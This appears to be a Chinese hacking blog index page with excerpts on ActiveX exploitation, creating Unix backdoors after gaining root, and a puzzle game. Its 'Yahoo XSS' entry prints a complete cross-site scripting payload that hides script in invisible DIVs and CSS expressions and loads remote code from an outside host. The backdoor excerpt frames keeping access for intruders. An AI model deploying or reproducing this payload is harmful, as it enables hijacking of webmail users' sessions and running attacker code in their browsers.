特殊的ActiveX再利用攻击的窍门及技术

偶像CZY的文章

form:http://blog.sina.com.cn/s/blog_51af865b0100glpl.html

==> 0x00 [前言] 
~~~~~~~~~~~~~~~~~~~ 
在本文章中,我并不对ActiveX控件的基本攻击方案进行讨论。我在这里所要讨论的是使用很多有趣的窍门和技术来开发利用ActiveX控件,无论你是渗透测试工作者还是计算机地下成员,这些窍门和技术你在测试的时候都可以用。当然,你首先必须掌握它的基本知识,这样你在阅读此文章的时候不会遇到困境而影响你的热情度。下面我将一一描述并写出例子代码来讨论特殊情况下值得掌握的一些技术。 
顺便提一下,为了避免坐牢或丢掉工作的危险,确保你具有在组织或企业的网络中执行下面技术的许可权,我强烈建议你手头有一张打印出来的许可文件。 

» 阅读全文

*nux如何创建后门

来源:http://www.key0.cn/post/34.html

千辛万苦(or 轻而易举)的取得root后,当然希望长久的保持. 以被以后用来。。。d0ing what u want t0 d0 :) 传统的方法就是建立一个后门(backd00r).即使入侵被发现,好 的(先进)后门仍然能够使你再次轻松的破门而入 -- 请记住: " we come back and we are the h.a.c.k.e.r "

» 阅读全文

yahoo xss 20090717失效

好像17号失效,20号我就看到了新版本的代码,牛人真多

 留个记号

XML/HTML代码
  1. <DIV id=yiv1634115559>  
  2. <div id="logo">xeye</div>  
  3. <DIV id=lovenly0 style="DISPLAY: none">http</DIV>  
  4. <DIV id=lovenly1 style="DISPLAY: none">script</DIV>  
  5. <DIV id=lovenly2 style="DISPLAY: none">://www.xxxxx.com/x</DIV>  
  6. <DIV id=lovely3 style="DISPLAY: none">window.yy=3;logo.id=lovenly0.innerHTML;window.onerror=function(){return    
  7. true};function go(){var    
  8. f=document.createElement(lovenly1.innerHTML);f.src=(lovenly0.innerHTML+lovenly2.innerHTML).replace(/!/g,String.fromCharCode(38));document.appendChild(f);};setTimeout(go,10);</DIV>  
  9. <DIV id=noly style="DISPLAY: none">logo.innerHTML=lovenly0.innerHTML;logo.id=lovenly0.innerHTML</DIV>  
  10. <DIV id=love title="<div style=top:expression((window.yy!=3?eval(lovely3.innerHTML):eval(noly.innerHTML)))></div>" style="DISPLAY: none"></DIV>  
  11. <STYLE>#yiv1634115559 a\{background-image:url("http://cn.yimg.com/i/sp/ok/themes.jpg?id=33593sort={3879};div{top:expression(logo.innerHTML=love.title;//");}</STYLE>  
  12. </DIV>  

XEYE's Game

6eb9840fb20b54caaa64574a.png

大小: 51.61 K
尺寸: 500 x 341
浏览: 44 次
点击打开新窗口浏览全图

过关需要技能:天文,物理,生物(DNA相关),化学,高等数学,科幻,英语

愿神保佑你们

 

http://xeye.us/xgame/

第一关:简单的字符加密,人物集合,天文学知识
第二关:文件格式,编程语言
第三关:智力型数字字符替换+变换
第四关:地理相关(或数学知识),化学知识,天文学知识
第五关:文件格式及修复相关,音乐知识
第六关:古典字符加密法、三维立体图
第七关:笛卡尔坐标系
第八关:图像、声音、视频
第九关:幻方、基因转录
第十关:图形组合、音频分析

Tags: hack, game

Total: 10Page 1 of 3123Next ›